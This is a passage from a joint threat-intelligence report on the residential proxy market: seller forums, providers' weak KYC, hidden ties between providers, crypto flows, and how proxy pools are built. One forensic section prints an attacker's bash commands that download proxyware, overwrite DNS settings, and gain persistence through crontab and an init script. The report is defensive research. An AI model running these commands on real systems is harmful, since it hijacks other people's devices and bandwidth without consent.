{ "id": "3a7d952c-ccfa-427c-bbe1-7ceba4a5778e", "created_at": "2026-04-06T00:14:03.703471Z", "updated_at": "2026-04-10T03:37:32.656993Z", "deleted_at": null, "sha1_hash": "c7349c7f4f8237977d2e2d9fcbcc1fef2f429afe", "title": "Uncovering residential proxy providers: Risks and market insights", "llm_title": "", "authors": "", "file_creation_date": "0001-01-01T00:00:00Z", "file_modification_date": "0001-01-01T00:00:00Z", "file_size": 5142280, "plain_text": "Uncovering residential proxy providers: Risks and market insights\r\nPublished: 2024-03-14 · Archived: 2026-04-02 12:29:55 UTC\r\nData in this article\r\nTL;DR\r\nIntroduction\r\nInside the offering world of RESIP providers\r\nA fragmented yet interconnected ecosystem\r\nResidential IP pool creation\r\nNavigating Greyhat and Blackhat uses\r\nRecommendations\r\nConclusion\r\nAppendixes\r\nTL;DR\r\nResidential proxies are intermediaries that allow an Internet connection to appear as coming from from\r\nanother host;\r\nThis method allows a user to hide the real origin and get an enhanced privacy or an access to geo-restricted\r\ncontent;\r\nResidential proxies represent a growing threat in cyberspace, frequently used by attacker groups to hide\r\namong legitimate traffic, but also in a legitimate way;\r\nThe ecosystem of these proxies is characterised by a fragmented and deregulated offering in legitimate and\r\ncybercrime webmarkets;\r\nTo obtain an infrastructure up to several million hosts, residential proxies providers use techniques that can\r\nmislead users who install third-party software;\r\nWith millions of IP addresses available, they represent a massive challenge to be detected by contemporary\r\nsecurity solutions;\r\nDefending against this threat requires increased vigilance over the origin of traffic, which may not be what\r\nit seems, underlining the importance of a cautious and informed approach to managing network traffic;\r\nThis joint report is built on extensive research from Sekoia.io Threat Detection \u0026 Research (TDR) and\r\nOrange Cyberdefense’s World Watch teams.\r\nIntroduction\r\nOn 25 January 2024 Microsoft released public guidance on how to defend against nation-state groups in which the\r\ngroup reported an espionage campaign byAPT29, a Russia-nexus intrusion set attributed by the US and UK\r\ngovernments to the Russian intelligence service SVR, that targeted Microsoft aiming to gather information about\r\nthemselves. In order to increase their operation security, APT29 operators relied on an (unnamed) Residential\r\nProxies (RESIP for RESIdential Proxies) service provider.\r\nhttps://www.orangecyberdefense.com/global/blog/research/residential-proxies\r\nPage 1 of 28\n\nIssues tied to RESIP are not well-known to the public, and neither by the cybersecurity community. While RESIP\r\nservice providers can be used for some legitimate uses, they are heavily abused by various types of cyber threat\r\nactors. In this report, analysts from Sekoia.io and Orange Cyberdefense delve into the phenomenon of RESIP,\r\nexplore the actual market landscape, which is composed of multiple shady providers, and explain how cyber threat\r\nactors abuse or even directly provide such services.\r\nFor several years, the financially motivated cybercrime ecosystem has been marked by the commodification of\r\nalmost every single step of an attack chain. While this trend can be interpreted as a sign of economic maturity\r\noutside of the cyber realm, this labour division implies that cyber operations now increasingly rely on a\r\nmultitude of third-party stakeholders. These providers specialise in services ranging from phishing kit creation,\r\nvulnerability research, bullet-proof hosting, traffic generation, malware development, etc. As highlighted by recent\r\nreports emanating from the cybersecurity community, RESIP has become an integral part of many malicious\r\noperations ranging from DDoS, cyberespionage, or financially motivated malware campaigns (1,2,3,4,5,6,). In\r\nmost cases, these proxies are used to conceal the last mile of the threat actor’s traffic before accessing or\r\ninteracting with a victim’s environment.\r\nBy definition, RESIP are “rentable” IP addresses assigned to residential devices used as an intermediary gateway\r\nbetween two hosts, facilitating the anonymisation of the former. RESIP typically encompasses real users' devices\r\nsuch as desktop, laptop computers, smartphones and even IoT devices. The residential IP addresses through\r\nwhich the traffic is proxied are most often Internet Service Providers’ (ISPs) subscribers and are particularly\r\nuseful in comparison with datacenter proxies or VPN IPs that are catalogued as belonging to commercial IP pools\r\nand not to genuine Internet “users”.\r\nOver the last few years, RESIP has attracted the attention of some security researchers and academics. Valuable\r\ninsights on how they work can notably be found in public reports from Trend Micro, DomainTools, Spur, etc. (see\r\nAppendix B: Literature on suspicious RESIP). Nevertheless, this subject often remains overlooked and\r\nobscure. This joint study by Orange Cyberdefense and Sekoia.io therefore aims to complete the existing literature\r\non RESIP and to provide a better picture of this ecosystem and the threats it embodies.\r\nIndeed, whether you or your company already rented access to RESIP, or if you are unfamiliar with this topic, we\r\nbelieve it is necessary to grasp the full scope of such a service and its main issues as a matter of both risk\r\nassessment and general awareness. Throughout this report, we will notably illustrate how the mere existence and\r\ncurrent systemic growth of RESIP can be problematic in two main dimensions:\r\nthe lack of transparency in the sourcing of RESIP constituting the pool of proxies advertised by these\r\nproviders.\r\nas mentioned above, the increasing adoption of RESIP by cyber actors to avoid being identified.\r\nThis joint report builds on extensive research from Sekoia.io Threat Detection \u0026 Research (TDR) and\r\nOrange Cyberdefense’s World Watch teams. It is also based on unique sightings we detected within our\r\nrespective clients’ base, with more than 10 clients identified as impacted by the presence of at least one proxyware\r\nwithin their corporate perimeters. In at least 3 sightings, this proxyware, which transforms “infected” device into a\r\npossible remote access point, had been installed through the download of free software by users. In another\r\ncase, we notably observed technical artefacts pointing to a phishing campaign leveraging a fairly well-known\r\nhttps://www.orangecyberdefense.com/global/blog/research/residential-proxies\r\nPage 2 of 28\n\nRESIP provider. This prompted us to check for additional risks induced, uncovering for example a client with\r\nmultiple machines which used this RESIP service. Now fully remediated, this incident highlights the subtle yet\r\nactive use of RESIP by various kinds of cyber actors, a tactic often going unnoticed by organisations even though\r\nit is not difficult to detect. At the end of this report, we provide technical indicators that can be leveraged for\r\nspecific threat hunting within your environments.\r\nInside the offering world of RESIP providers\r\nThis section aims at providing a comprehensive understanding of the RESIP providers activities, mainly those\r\noperating on forums prized by cybercriminals.\r\nMethodology\r\nFor our analysis, we monitored and analysed publications on 5 forums where RESIP providers are most active: \r\nBreachForums, \r\nNulled, \r\nXSS, \r\nBlackHatWorld,\r\nZelenka.\r\nFigure 1 - Results page for RESIP search on Nulled forum (as of 08/02/2024)\r\nWe analysed over 50 RESIP offerings on these forums throughout 2023 to identify any patterns and structuring\r\ntrends associated with this specific type of service. Of these providers, the vast majority emerged during 2023 (the\r\ncut off date being November 2023).\r\nFrom our observations, most publications promoting RESIP services are easy to access, compared to some\r\nmore “underground”, knowingly illicit, services. Indeed, they use explicit titles on ads published on Clear Web-accessible forums. \r\nComparing the ads displayed on the observed forums enabled us to notice that a larger segment of RESIP\r\nadvertisements occur on well-established, “low tier” forums such as BlackHatWorld (BHW) or Nulled, which tend\r\nto gather an audience not exclusively involved in cybercrime, i.e. greyhat activities. As a reminder, while Nulled\r\nemerged around 2014, BHW surfaced in the early 2000s and continues to attract individuals who are also looking\r\nfor legitimate services ranging from copywriting, web design, social media marketing, etc.\r\nhttps://www.orangecyberdefense.com/global/blog/research/residential-proxies\r\nPage 3 of 28\n\nDuring the time frame of our analysis, at least 5 to 10 new threads offering RESIP were posted each month on\r\nBlackHatWorld, in addition to older but still active threads being “refreshed” to appear on the first page of the\r\nforum section. For instance, the most replied thread promoting RESIP on BlackHatWorld dates back to November\r\n2013 and counts around 6,000 replies.\r\nAnalysis of a standard offering\r\nA typical ad features a series of key characteristics:\r\nDescription of the services (i.e. if datacenter, mobile and/or residential IPs) sometimes using a screenshot\r\nof the welcome page of the provider's website;\r\nKey information such as the size of the IP addresses’ pool, the number of countries available, the price\r\nrange, etc;\r\nContact information and URLs for purchases.\r\nFigure 1 bis - Example of an ad for LumiProxy posted on BHW (as of 29/02/2024)\r\nhttps://www.orangecyberdefense.com/global/blog/research/residential-proxies\r\nPage 4 of 28\n\nThe pricing of RESIP on cybercrime platforms is often determined by the durations of the subscriptions, from\r\nshort to long-term. Prices are commonly calculated on a one-month basis. Longer subscription periods offer\r\nsavings compared to shorter-term commitments, encouraging users to commit to extended periods, providing a\r\ncertain level of stable revenues for the platform.\r\nAs the RESIP market is highly crowded, providers need to differentiate themselves from competitors. Among the\r\nadopted strategies, we observed the following:\r\nSize and localization of the IP pool, i.e. number of proxies “rented”, in particular on highly demanded\r\ncountries;\r\nFinancial incentives, the pricing model often relies on traffic volume allocated to users, on a fixed per-gigabyte basis. We also observed RESIP providers repeatedly offering discounted prices based on volume\r\nor to attract new customers;\r\nAccepted payment methods, and in particular anonymous cryptocurrencies.\r\nSimplified purchase process flow, automating access to the service immediately after payment;\r\n24/7 dedicated support, responsive customer services are commonly guaranteed by most RESIP (mainly\r\nvia dedicated Telegram accounts).\r\nProviders often redirect customers for the actual purchase of the service to their website but also to a dedicated\r\nsales email address, Telegram channel, WhatsApp number or Discord server. It should be noted that some\r\nproviders don't necessarily (and sometimes purposely) own a dedicated website and prefer to sell their services\r\ndirectly through Telegram. The diagram above highlights the different sales channels adopted by the RESIP\r\nbelonging to our study sample.\r\nFigure 2 - Sales channels used by our sample of RESIP providers\r\nMoreover, most RESIP providers advertise services they market quite freely, using typical marketing methods\r\nsuch as Google ads to boost the ranking of their website on search engines (i.e. Search Engine Optimisation), or\r\nadvertisements in dedicated blog posts comparing the best RESIP.\r\nhttps://www.orangecyberdefense.com/global/blog/research/residential-proxies\r\nPage 5 of 28\n\nProfiling the sellers\r\nFrom our observations, the accounts advertising RESIP services on studied forums were created specifically for\r\npromoting each of these providers respectively.\r\nMost of the advertisements we studied were written in English or in Russian (to a lesser extent), or in both\r\nlanguages in the case of Zelenka, a mostly Russian-speaking forum. \r\nThrough OSINT analysis, we tried to identify the geographical origin of the providers, by pivoting on the official\r\nbusiness name and potential businesses registration matricula, if possible. We noticed a lot of the RESIP we\r\nanalysed are actually either not registered as an official legal entity in their respective country or possess only\r\n“mailbox” offices in a country without stringent legislations on the topic (ex. the British Virgin Islands).\r\nTurning a blind eye\r\nThe mere existence of ads for RESIP in cybercrime-oriented forums obviously raises questions on the ethical\r\nnature of the RESIP providers’ market positioning. They know users active on these forums have a strong\r\npotential to become customers but may conduct illegal activities. It thus deeply roots the RESIP ecosystem\r\ninto a shady and underground dimension. Interestingly enough, this proximity with other cybercrime-oriented\r\nservices also tends to contrast a lot with the presumed clean, transparent or even \"start-up like'' aspects of most of\r\nthe RESIP websites.\r\nThis contradiction is also visible in the lack of transparency on most RESIP legal existence, on how unclear their\r\nIP pools are constituted and in their general lack of concern about what their proxies are used for. Two key\r\nindicators for this are the often absence of KYC measures as well as permissive ToS and Conditions of Use most\r\nRESIP adopt (if any). \r\nAbsence of KYC and compliance measures\r\nKnow-Your-Customer (KYC) is the process of identifying and verifying the client's identity when getting an\r\naccount and periodically over time. It is considered as a measure ensuring that a client doesn’t make a malicious\r\nuse of its account. Some business-oriented RESIP providers claim to adhere to such KYC processes, such as\r\nOxylabs. Some providers also put forward security compliance insurances to attempt certifying their products as\r\nsafe. This is for instance the case of EarnApp, as directly shown in this retrieved Google sheet.\r\nhttps://www.orangecyberdefense.com/global/blog/research/residential-proxies\r\nPage 6 of 28\n\nFigure 3 - Example of compliance measures put forward by EarnApp\r\nThese KYC regulations are required in most Western countries. However, they are less or not enforced in some\r\ncountries where providers are established (Hong Kong, Russia, Cyprus, etc.)\r\nIn our sample of RESIP ads observed on underground forums, 100% of the providers we analysed did not mention\r\nany KYC measures: no ID proof, age verification, postal address or business registration information were\r\nrequired, etc. These providers typically offer immediate access to the service as soon as the payment is received. \r\nTerms of Services\r\nMost providers protect themselves with terms of service clearly stating that customers are responsible for the\r\nactivity done with the rented proxies, and that they must abide by all applicable laws. This enables RESIP\r\nproviders from being sued for the actions conducted by their clients through their services. It should nonetheless\r\nbe noted that several RESIP, especially those located in Hong Kong, still explicitly forbid the use of their RESIP\r\nfor leveraging illegal and criminal activities such as money laundering, stealing trade secrets and personal\r\ninformation. \r\nEthically-sourced proxies, a needed “brandwashing”\r\nMany providers willing to appear reputable have to fight for their brand image, and thus argue their proxies are\r\n\"ethically-sourced\". Unfortunately, not a lot of details on the actual processes used to acquire proxies are\r\nprovided. Some do mention the restrictions they added and declare having a due diligence process before\r\naccepting new proxies. We doubt these verifications are sufficient to detect motivated cybercriminals willing to\r\nmonetise their botnets, nor that providers are investing sufficiently to track and tackle abuse of their services.\r\nA fragmented yet interconnected ecosystem\r\nUpon further analysis, we also identified strong overlaps between different RESIP. The sometimes “hidden”\r\nconnections we found enable us to believe the RESIP market could be less fragmented than what it seems.\r\nMade-up fragmentation\r\nIndeed, some seemingly distinct RESIP can be in fact closely interconnected, either by belonging to the same legal\r\nentity, by sharing a consistent portion of their server infrastructure or by using common cryptocurrency channels. \r\nIn the case of PiaS5Proxy, our investigation revealed associations with 5 additional proxy (or VPN) providers.\r\nIndeed, PiaS5Proxy, ABCProxy and 922Proxy list the same Ethereum (a.k.a. ETH) wallet address on their\r\nrespective websites. This overlap is particularly significant, as this specific wallet is the one that features the most\r\ntransactions compared to other cryptocurrency wallets. In addition, the three RESIP providers rely on another\r\nETH wallet (0x8379c994c5c39fc9c66bf5b55aa796920e532511) used further along in the transaction chain to\r\ngather and aggregate all their ETH incomes. This one gathered almost 400,000$ but is unused since the end of\r\nJanuary 2024.\r\nhttps://www.orangecyberdefense.com/global/blog/research/residential-proxies\r\nPage 7 of 28\n\nPiaS5Proxy is tied to an entity named MARS BROTHERS LIMITED (an Android developer active since\r\n2022), mentioned directly in PiaS5Proxy’s website and registered in Hong Kong since March 2022.\r\nAdditionally, PiaS5Proxy appears to have links with an entity called HONGKONG GUANGLING MDT\r\nINFOTECH LIMITED, as shown on their website and the corresponding LinkedIn profile. This organisation,\r\nwhich is also registered in Hong Kong since September 2018, is mentioned on the websites of ABCProxy and\r\n922Proxy as well as on the website of the now-defunctFlyGateVPN service, according to archived website\r\nrecords.\r\nFinally, PiaS5Proxy also mentions on its website a third legal entity called ROME BELDEN LIMITED, which\r\nwas also registered in Hong Kong in March 2023. This same entity name is mentioned on the websites of\r\nLunaProxy and PyProxy.\r\nFigure 4 - Ties around PiaProxy organisational cluster\r\nDedicated shops and reselling channels \r\nBeyond the RESIP that openly and directly advertise their services on forums, a vast network of resellers also\r\nemerged in the last few years. We notably observed the activity of shops such as NightShop and ProxyWave Shop,\r\nspecialised in reselling access from known RESIP.\r\nhttps://www.orangecyberdefense.com/global/blog/research/residential-proxies\r\nPage 8 of 28\n\nThe proliferation of resellers and dedicated shops is indicative of increasingly diversified supply chain models on\r\na highly lucrative market. It is highly likely driven by an escalating demand for anonymity and further fuels the\r\naccessibility of RESIP for an increasing number of malicious actors.\r\nRebranding\r\nFurthermore, some RESIP tend to rebrand over time, adopting a new name, visual identity, and website to\r\nrelaunch their business activities. Rebranding is far from being unique to this market segment and typically occurs\r\nwhen a business wishes to increase brand image after a certain period. \r\nYet, this practice is also useful to mitigate the impact of negative reviews or events attached to the brand:\r\nstarting a new is a way to detach oneself from controversies and past reputation hits. This is for instance the case\r\nof Luminati, that is now Bright Data. Or IPRoyal, a UAE-based RESIP, which rebranded in December 2023 to\r\nPawns.app and justified this decision by wanting “to change the perception of who we are and what we value”.\r\nFinancial flows related to RESIP \r\nAnother key aspect when it comes to understanding this RESIP ecosystem and its transparency is understanding\r\nhow lucrative it really is. \r\nMost RESIP welcome a great variety of payment methods, including credit cards, cryptocurrencies or PayPal. The\r\ndiagram below reveals the propensity of our sample to favour certain payment methods. More than half of the\r\nRESIP we encountered accepted cryptocurrencies to carry their financial transactions with their customers. In\r\nsome limited cases (less than 5), cryptocurrencies were the only valid payment method.\r\nFigure 5 - Payment methods used by our sample of RESIP providers\r\nhttps://www.orangecyberdefense.com/global/blog/research/residential-proxies\r\nPage 9 of 28\n\nWe were able to further our investigation into the crypto wallets used by some of the RESIP belonging to our\r\nsample. Despite the intense volatility of the amount of money in these wallets over time, we notably identified\r\nseveral wallets that collected between $25K up to $36K worth of Bitcoin. We believe these amounts may not be\r\nrepresentative as wallets belonging to more prolific RESIP could actually have collected way more. \r\nFurthermore, a trend we noticed is the short lifetime of the wallets publicly visible on the RESIP website’s order\r\npage. The average lifespan of cryptocurrency wallets seems to be around 230-250 days. From a hypothetical point\r\nof view, it seems that RESIP tends to renew their wallets every year, typically letting their cryptocurrency wallets\r\ninactive for between 230 and 250 days before resuming activity at the beginning of the year. This particular\r\nobservation suggests the possibility of a deliberate strategy by RESIP to cover their tracks and increase the\r\ndiscretion of their blockchain transactions.\r\nAnother trend we identified when specifically analysing Ethereum and Tron blockchains wallets for PiaS5Proxy,\r\nABCProxy and 922Proxy, is the recurring movement of funds to a central wallet, with such “concentration”\r\ntransactions being replicated by several other wallets once they reach a certain amount. This repetitive process\r\nreinforces the idea of a deliberate desire to centralise amounts, suggesting a concerted strategy to consolidate\r\ndispersed assets, often ending up on Binance and optimising the management of assets on the blockchain and\r\nmaximising their efficiency.\r\nResidential IP pool creation\r\nIn the previous section, we explored the market of RESIP providers, highlighting the shady practices and\r\nfragmented nature of it. What sets these rented proxies apart is their ability to offer IP addresses in specific\r\ncountries that appear to be ordinary home connections, making them particularly effective at bypassing\r\ngeographical blocks and bot or fraud detection filters. \r\nHowever, a key question remains: how do these RESIP networks build up their vast pool of IP addresses? We\r\nexamined in detail the mechanisms and strategies deployed to create and manage these IP pools in this section. \r\nThe size of the pool of IP addresses plays a crucial role for RESIP. Expanding this network involves acquiring\r\nmany links, i.e. individual connection points. These exit points include IP addresses from home routers, personal\r\ncomputers, smart TVs and increasingly, mobile phones using 4G and 5G networks. This process demands not only\r\nengaging directly with numerous individual users worldwide willing to “rent” for a fee access to their bandwidth.\r\nBut also implement more dubious and even illicit techniques to acquire without consent access to geographically\r\ndispersed Internet accesses.\r\nVoluntary contributions\r\nOne public strategy adopted by RESIP is the involvement of conscious and willing users. These users download\r\nand install specific software on their devices, called proxyware, enabling them to act as exit points for the\r\nRESIP network. In exchange for the bandwidth they allow to flow through their IP, these users are paid,\r\ndepending on the amount of traffic transmitted. Notable examples of this practice include Pawns.app, EarnApp,\r\nand HoneyGain.\r\nhttps://www.orangecyberdefense.com/global/blog/research/residential-proxies\r\nPage 10 of 28\n\nFigure 6 - Pawns.app download page, offering different platforms to users wishing to take part in\r\nthe rewards program\r\nThese providers encourage users to share their unused bandwidth in exchange for financial compensation,\r\noften without users having a full understanding of the end use of their internet connection.\r\nIntegration into applications via SDKs\r\nThe second method RESIP uses involves embedding proxyware into SDKs (Software Development Kits), present\r\nin many types of applications: desktop software, browser plugins, or even in Android or iOS mobile\r\napplications. Developers can register and receive a kit to integrate proxyware easily into their software.\r\nhttps://www.orangecyberdefense.com/global/blog/research/residential-proxies\r\nPage 11 of 28\n\nFigure 7 - Example of a Bright Data SDK documentation page for a developer wishing to integrate\r\nproxyware into his software\r\nUnlike the voluntary contributions by IP address owners, this approach is more subtle. In this case, the proxyware\r\nis often embedded in a product or service. Users may not notice a proxyware will be installed when accepting the\r\nterms of use of the main application it is embedded with. This lack of transparency leads to users sharing their\r\nInternet connection without a clear understanding.\r\nhttps://www.orangecyberdefense.com/global/blog/research/residential-proxies\r\nPage 12 of 28\n\nFigure 8 - Example of Bright Data proxyware in the Free Snipping Tool and Megacubo software on\r\nWindows\r\nThis approach raises ethical questions about transparency and consent. Users may feel misled if they discover\r\nthat their Internet connection is being used for purposes they had not fully intended.\r\nEven if sometimes the techniques can be seen as deceptive, consent is still somehow requested, compared to other\r\npractices described below.\r\nInstallation via a compromised system\r\nFinally, a particularly malicious practice involves compromising devices and clandestinely installing proxyware\r\non them. In these cases, the attackers infiltrate their victims' systems without their consent and secretly install the\r\nsoftware, making the device an unwitting exit point for the RESIP network.\r\nIn 2023, we observed a compromise of one of our partners, initially detected following an unusual increase in\r\nnetwork traffic on one of the systems monitored. An investigation of this machine revealed that a proxyware had\r\nbeen installed without the user’s consent. Forensic analysis determined the method used by the attacker to install\r\nand hide this proxyware service was directly associated with Pawns.app.\r\nhttps://www.orangecyberdefense.com/global/blog/research/residential-proxies\r\nPage 13 of 28\n\nFigure 9 - Chain of compromise leading to the installation of proxyware\r\nAfter accessing the system via an SSH connection, the attacker downloads a binary, enabling him to establish his\r\nown SSL/TLS tunnel via revsocks. This file was hosted on a device that appears to have been previously\r\ncompromised, and used as a relay to store all the necessary binaries. The attacker then executes a series of\r\ncommands in Bash, which we will detail below.\r\nFirstly, the attacker modifies the host's DNS configuration by specifying the use of Cloudflare's DNS. This step\r\naims to avoid being blocked by a pre-existing configuration.\r\n grep -qF 'nameserver 1.1.1.1' /rom/etc/resolv.conf || echo 'nameserver 1.1.1.1' \u003e /rom/etc/\r\nThe attacker then sets up a system process, in this case the “whatchdog” process, with proxyware.\r\n $ pidof whatchdog || pgrep whatchdog || ash -c \"wget -O /tmp/logs/.config/whatchdog [REDACT\r\nAfterwards, the attacker downloads a binary called \"iparmv6\" onto the host. This executable, belonging to\r\nPawns.app, is packed using UPX. Of note, the attacker has previously configured his account, as evidenced by\r\nusing his credential as an argument during the execution of the proxyware.\r\nFinally, the attacker has set up persistent execution of the binary via the Linux crontab, enabling the following\r\ncommands to be launched regularly:\r\nhttps://www.orangecyberdefense.com/global/blog/research/residential-proxies\r\nPage 14 of 28\n\ncroncmd1=\"/tmp/logs/.config/chron || cd /tmp/logs/.config \u0026\u0026 wget -O chron [REDACTED]/chront\r\n croncmd2=\"grep -qF 'nameserver 1.1.1.1' /etc/resolv.conf || echo 'nameserver 1.1.1.1' \u003e\u003e /etc/\r\n cronjob1=\"*/10 * * * * $croncmd1\"\r\n cronjob2=\"@reboot $croncmd2\"\r\n ( crontab -l | grep -v -F \"$croncmd1\" ;echo -e \"$cronjob1\") | crontab -\r\n ( crontab -l | grep -v -F \"$croncmd2\" ;echo -e \"$cronjob2\") | crontab -\r\nAfter performing this persistent installation, the attacker actively explores other locations to duplicate the binary,\r\ntargeting services such as lighttpd for further implementation. This strategy aims to consolidate the continuity of\r\nits passive revenues, as shown in this command:\r\n grep -qxF '/home/user/chron' /etc/init.d/lighttpd || echo '/home/user/chron' \u003e\u003e /etc/init.d/\r\nThis command checks the existence of the line /home/user/chron in the lighttpd service initialisation script. If this\r\nline is not present, it adds it to the file. As a result, the /home/user/chron script is executed each time the lighttpd\r\nservice is started. On the same host, similar actions have been repeated several times, with scripts offering\r\nidentical functionality but under different names. It is also important to note that the attacker is using the current\r\nhost to install and make accessible via the Internet all the binaries deployed during his installation. Indeed,\r\nmultiple SSH connections to various hosts were observed from the initially compromised machine, and the same\r\nfiles were found by following these IP addresses.\r\nThe files installed are Pawns.app binaries, compressed with UPX, and compatible with several processor\r\narchitectures: ARM, x32, x64. In this way, the victim's host is used to compromise other hosts as well, making it\r\ndifficult to determine the attacker's origin.\r\nAlthough Pawns.app is a legitimate service used in the B2B sector, it is a reality that it is exploited by malicious\r\nactors who compromise systems, without the victim's knowledge.\r\nDespite their simplicity compared to the more sophisticated techniques seen in other attack campaigns in 2024, the\r\nuse of these basic commands is all the more effective against devices such as personal routers or connected\r\nobjects, which often lack robust security mechanisms. As a result, without even being aware of it, a user can\r\nunwittingly become part of a pool of proxies offered by a RESIP.\r\nNavigating Greyhat and Blackhat uses\r\nGreyhat use\r\nResidential proxies are widely used by companies or individuals for several legitimate purposes, including to\r\naccess geographically-restricted web resources. These services are marketed mostly for enabling massive Web\r\nhttps://www.orangecyberdefense.com/global/blog/research/residential-proxies\r\nPage 15 of 28\n\nscraping in particular for “Market research”, i.e. competitors and price monitoring. An important example of\r\nRESIP usage is the operating of “sneaker bots”, i.e. automated bots designed to ‘cop’ rare shoes sold online. \r\nA few more use cases are often mentioned:\r\nAd verification (for advertisers);\r\nCustomer analysis (review brand reputation of own clients);\r\n“MultiLogin”: register multiple accounts on the same online service.\r\nAs seen below on the website of PiaS5 Proxy, some use cases are sometimes a bit far-fetched. Some even mention\r\nproxies can help enhance their “Brand protection”.\r\nFigure 10 - Examples of uses for PiaS5 Proxy\r\nThese usages are not per se what people would define as illicit. Yet, this usage of RESIP is also far from being\r\nfully transparent and legitimate. Using RESIP for sneaker bots actually entirely conflicts with Terms of Use from\r\nonline retailers which explicitly prohibit the use of any automated scraping techniques. Indeed, by making\r\nmultiple requests from different IP addresses thus locations, the buyer effectively bypasses the various security\r\nmeasures put in place by the web application to try to enforce these ToU (including geolocation restriction, IP\r\nthrottling or blocking, CAPTCHAs, etc). \r\nIn the absence of general law or regulation related to RESIP in France and Europe, these Terms of Use become the\r\ncontractual law of reference. This implies that even some usages of RESIP which might not be considered as\r\n“illegal” under the blurry category of cybercrime could actually embody an illicit situation because of ToU\r\nbypassing. \r\nUnfortunately, for e-commerce providers willing to take action against RESIP abuse, a favourable legal decision is\r\nhighly uncertain and costly. No legal precedents or jurisprudence seem to exist in the market. \r\nBlackhat use\r\nThese RESIP are also used directly to conduct cyberattacks and to launch malicious campaigns. Throughout our\r\nresearch, including on public reports by CTI analysts and cybersecurity vendors, we observed several cases where\r\nhttps://www.orangecyberdefense.com/global/blog/research/residential-proxies\r\nPage 16 of 28\n\nthese proxies were integrated in different types of attack chains:\r\nCyberespionage-related password spraying attacks\r\nIn a campaign detailed by Microsoft, APT29 leveraged RESIP networks to route their traffic interacting with the\r\ncompromised tenant through a vast number of IP addresses blending with legitimate users’ traffic;\r\nFinancially-motivated social engineering campaigns\r\nMandiant reports that UNC3944 (a.k.a. Scattered Spider) used RESIP services to target their victims to\r\ncircumvent location-based security controls;\r\nDDoS attacks\r\nmany campaigns relying on RESIP were recorded, including the attack against Philippine’s media company\r\nRappler (which notably leveraged the infrastructure of FineProxy and RayoByte). According to Qurium’s report,\r\nboth companies’ infrastructure has previously been linked to pay-as-you-go DDoS services;\r\nBrute force attacks\r\ni.e. the one against the Standard Bank and the online payment system Venmo;\r\nPhishing\r\nnumerous Phishing-as-a-Service tools and platforms include or leverage RESIP in their offerings. This is notably\r\nthe case of the Caffeine platform that relies on Froxy for its adversary-in-the-middle capabilities;\r\nBotnet-led spam campaigns\r\nAT\u0026T notably detailed in August 2023 a RESIP botnet targeting macOS systems and Windows users with a\r\nmalware called AdLoad. The objective of this botnet made of RESIP is still unclear, but so far it has already been\r\ndetected delivering spam campaigns. \r\nTo sum up, cyber actors have been trying to bypass security measures set by organisations and further evade\r\ndetection by relying on RESIP to hide their actual IP address behind ones commonly associated with home users,\r\nwhich are unlikely to be present in blocklists. Indeed, this makes it hard for protection mechanisms to discern\r\nbetween suspicious and regular traffic. This technique makes traditional indicators of compromise-based detection\r\ndifficult due to the high churn rate of IP addresses. \r\nIt should be noted that a few service providers created or leveraged by cyber actors for ‘blackhat” activities were\r\nnevertheless sued in the past, with limited results. Microsoft, for example, took over a botnet abusing NO-IP\r\nservice, the leading dynamic DNS provider, in 2014. But it somehowbackfired as impacts were felt by legitimate\r\nNO-IP customers. Anti-piracy consortium BREIN did also sue Ecatel / Quasi networks in 2018, but even in this\r\ncase, this malicious hosting provider escaped the ruling by ceasing operations (and most probably rebranding\r\nunder a new name). Finally, combating these illegal usages of RESIP remain difficult since the market is heavily\r\nfragmented, meaning no single provider is a major-enough actor worth tackling. One malicious going down\r\nwould only mean cyber actors would move on to any of the numerous other providers.\r\nhttps://www.orangecyberdefense.com/global/blog/research/residential-proxies\r\nPage 17 of 28\n\nRecommendations\r\nDue to the risks of running proxyware within a corporate network, i.e. actually having unapproved software\r\ninstalled on a managed device, organisations should preemptively ban installation of proxyware (via application\r\nblack/whitelisting, user rights restriction, internal firewall/ACL rules, etc.).\r\nThose willing to identify proxyware already installed (or attempts to install such programs) within their networks\r\nshould regularly hunt for the presence of specific known IOCs (network- and host-based ones, as you can find\r\nin Appendix C), on top of configuring detection strategies for suspicious traffic behaviour.\r\nSekoia and Orange Cyberdefense specialise in defending against a wide range of threats, including\r\nproxyware, so do not hesitate to contact our representatives if you want to assess the risks for your\r\nnetworks, conduct specific hunting or proactively block them on your systems.\r\nWe can for instance help you configure some of your security solutions to try to block proxies internally, and\r\nenrich suspicious events investigated by your SOC teams, with our constantly up-to-date Threat Intelligence. \r\nIf your company needs to acquire RESIP services for legitimate use cases, you should rely on a stringent due\r\ndiligence process to select a reputable RESIP as much as possible. On top of the contractual terms of service to\r\ncheck diligently, consider the following criteria:\r\nthe existence of a legal entity based in a European Union country, \r\nthe KYC processes used by this provider, \r\nthe ethics on how the proxies are collected,\r\nif dedicated proxies (vs. shared ones) are available, \r\nif traceable transactions (no cryptocurrencies) are accepted, \r\netc.\r\nInternet users should protect their mobile and desktop devices by:\r\nConsented use: \r\nrefrain from joining a proxy network, \r\nor at the very least, opt only for reputable providers based in the European Union.\r\nUnconsented use (deceived or hacked): \r\navoid installing free programs, in particular free VPNs, but also free mobile or TV apps, browser\r\nplugins, etc. that may bundle proxyware (or even malware) without your actual knowledge, \r\nIf you do, read carefully the ToS of any application you install, and deactivate the proxy feature\r\nwhen possible,\r\ndon’t click on Sponsored results from search engines (and social networks),\r\ndon’t install programs from outside of the official app stores,\r\ndon’t download cracked software (and actually any application) using Torrent or unsafe distribution\r\nchannels,\r\nconfigure OS users with limited rights (and keep Administrator accounts for management\r\npurposes), \r\netc.\r\nhttps://www.orangecyberdefense.com/global/blog/research/residential-proxies\r\nPage 18 of 28\n\nConclusion\r\nInvestigations performed by the analysts at Sekoia.io and Orange Cyberdefense highlight the current challenges\r\nassociated with the proliferation of RESIPs. While RESIP-related activities are not malicious per se, they do\r\nfacilitate both espionage and lucrative campaigns. RESIP services that are highly prized by attackers for their\r\neffectiveness in evading attribution following malicious campaigns, including hacking, fraud and denial-of-service. \r\nOn the one hand, the lack of transparency regarding provider’s legal status, IP pool creation and adherence to\r\nKYC measures raises ethical concerns and shady reputation cases. While the concept of “ethically-sourced”\r\nproxies emerges as a potential solution, the effectiveness of such branding remains uncertain. \r\nOn the other hand, such activities are difficult to be clustered and disrupt. While law enforcement agencies have\r\ntaken various actions aimed at disrupting RESIP services over time, these efforts remained isolated cases.\r\nExamples include the dismantlement of the Rsocks proxy service and, more recently, the disruption of the IPStorm\r\nbotnet, that likely had a limited, short-term effect, as the market remains highly competitive. \r\nMoreover, if such actions aren't followed by any repressive effort, providers can easily revive their infrastructure.\r\nRESIP services leveraged by cybercriminal actors are typically relatively 